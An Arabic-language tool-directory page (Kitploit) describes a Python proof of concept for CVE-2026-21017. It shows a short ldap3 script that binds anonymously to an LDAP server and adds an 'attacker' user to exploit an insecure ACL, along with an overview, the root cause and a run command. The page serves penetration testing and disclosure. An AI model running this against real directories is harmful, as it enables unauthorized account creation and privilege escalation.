Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — إثبات مفهوم بلغة بايثون لتصعيد الامتيازات عبر الربط المجهول في LDAP، يحاكي قوائم التحكم في الوصول (ACLs) غير الآمنة لإنشاء مستخدمين بصلاحيات إدارية عبر عمليات ربط LDAP غير مصادَق عليها. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقسوء التكوين
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

إثبات مفهوم بلغة بايثون لتصعيد الامتيازات عبر الربط المجهول في LDAP، يحاكي قوائم التحكم في الوصول (ACLs) غير الآمنة لإنشاء مستخدمين بصلاحيات إدارية عبر عمليات ربط LDAP غير مصادَق عليها.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-21017 – تصعيد صلاحيات LDAP عبر الربط المجهول (Anonymous Bind)

كود البرنامج (محاكاة Python ldap3)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – تصعيد صلاحيات LDAP عبر الربط المجهول (Anonymous Bind)

Severity: Critical

نظرة عامة

تم إعداد دليل LDAP بشكل غير صحيح للسماح بالربط المجهول كما يمنح صلاحيات كتابة للسمات الحساسة (مثل userPassword). يمكن للمهاجم الربط بشكل مجهول وإنشاء مستخدم إداري جديد، مما يؤدي إلى تصعيد الصلاحيات.

تفاصيل الثغرة

  • النوع: تحكم غير كافٍ في الوصول
  • التأثير: اختراق كامل للدليل.
  • السبب الجذري: قائمة التحكم في الوصول (ACL) لا تقيد عمليات الكتابة على المستخدمين الموثقين.

عرض الاستغلال

شغّل المحاكاة (يتطلب خادم LDAP فعليًا لإجراء اختبار حقيقي، لكننا نعرض المفهوم):

root@kitploit:~
python ldap_anon_sim.py

يحاول السكربت إضافة مستخدم بشكل مجهول.

تنزيل الأداة